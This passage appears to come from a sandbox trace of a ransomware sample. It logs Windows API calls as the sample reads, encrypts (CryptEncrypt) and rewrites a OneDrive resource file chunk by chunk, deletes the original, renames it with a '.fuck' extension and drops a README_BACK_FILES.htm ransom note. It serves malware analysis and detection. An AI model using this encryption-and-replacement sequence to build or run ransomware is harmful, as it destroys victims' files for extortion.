lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.026] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.026] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.026] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.027] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.027] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.027] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.027] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.027] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.028] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.028] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.028] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.028] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.028] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.029] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.029] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.029] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.029] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.030] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.030] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.030] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.030] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.030] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.030] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.030] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.031] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.031] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.031] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.031] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.031] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.031] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.031] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.031] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.031] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.032] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.032] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.032] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.032] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.032] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.032] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.033] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.033] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.033] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.033] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.034] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.034] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0273.034] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x50, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0273.034] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0273.034] CloseHandle (hObject=0x5d4c) returned 1 [0273.034] CloseHandle (hObject=0x5d48) returned 1 [0273.035] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.041] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.042] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.044] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.046] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.046] CryptDestroyKey (hKey=0x2fb108) returned 1 [0273.046] CryptReleaseContext (hProv=0x2f298e8, dwFlags=0x0) returned 1 [0273.046] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.046] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0273.046] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\readme_back_files.htm")) returned 0xffffffff [0273.047] AreFileApisANSI () returned 1 [0273.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0273.047] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\az-latn-az\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\az-latn-az\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.048] GetFileType (hFile=0x5d3c) returned 0x1 [0273.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.051] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.051] FindFirstFileA (in: 